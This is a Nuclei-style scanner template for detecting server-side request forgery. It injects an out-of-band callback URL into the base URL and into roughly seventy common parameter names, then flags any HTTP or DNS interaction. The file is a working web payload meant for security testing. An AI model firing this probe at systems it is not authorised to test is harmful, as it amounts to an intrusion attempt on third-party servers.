ssrf.yaml

id: generic-ssrf

info:
  name: generic-ssrf
  author: nagli
  severity: high
  reference: ssrf
  tags: ssrf

requests:
  - method: GET
    path:
      - '{{BaseURL}}http://{{interactsh-url}}'
      - '{{BaseURL}}test&access={{interactsh-url}}&remote_url={{interactsh-url}}&admin={{interactsh-url}}&dbg={{interactsh-url}}&debug={{interactsh-url}}&edit={{interactsh-url}}&grant={{interactsh-url}}&test={{interactsh-url}}&alter={{interactsh-url}}&clone={{interactsh-url}}&create={{interactsh-url}}&delete={{interactsh-url}}&disable={{interactsh-url}}&enable={{interactsh-url}}&exec={{interactsh-url}}&execute={{interactsh-url}}&load={{interactsh-url}}&make={{interactsh-url}}&modify={{interactsh-url}}&rename={{interactsh-url}}&reset={{interactsh-url}}&shell={{interactsh-url}}&toggle={{interactsh-url}}&adm={{interactsh-url}}&root={{interactsh-url}}&cfg={{interactsh-url}}&dest={{interactsh-url}}&redirect={{interactsh-url}}&uri={{interactsh-url}}&path={{interactsh-url}}&continue={{interactsh-url}}&url={{interactsh-url}}&window={{interactsh-url}}&next={{interactsh-url}}&data={{interactsh-url}}&reference={{interactsh-url}}&site={{interactsh-url}}&html={{interactsh-url}}&val={{interactsh-url}}&validate={{interactsh-url}}&domain={{interactsh-url}}&callback={{interactsh-url}}&return={{interactsh-url}}&page={{interactsh-url}}&feed={{interactsh-url}}&host={{interactsh-url}}&port={{interactsh-url}}&to={{interactsh-url}}&out={{interactsh-url}}&view={{interactsh-url}}&dir={{interactsh-url}}&show={{interactsh-url}}&navigation={{interactsh-url}}&open={{interactsh-url}}&file={{interactsh-url}}&document={{interactsh-url}}&folder={{interactsh-url}}&pg={{interactsh-url}}&php_path={{interactsh-url}}&style={{interactsh-url}}&doc={{interactsh-url}}&img={{interactsh-url}}&filename={{interactsh-url}}'  

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "http"
          - "dns"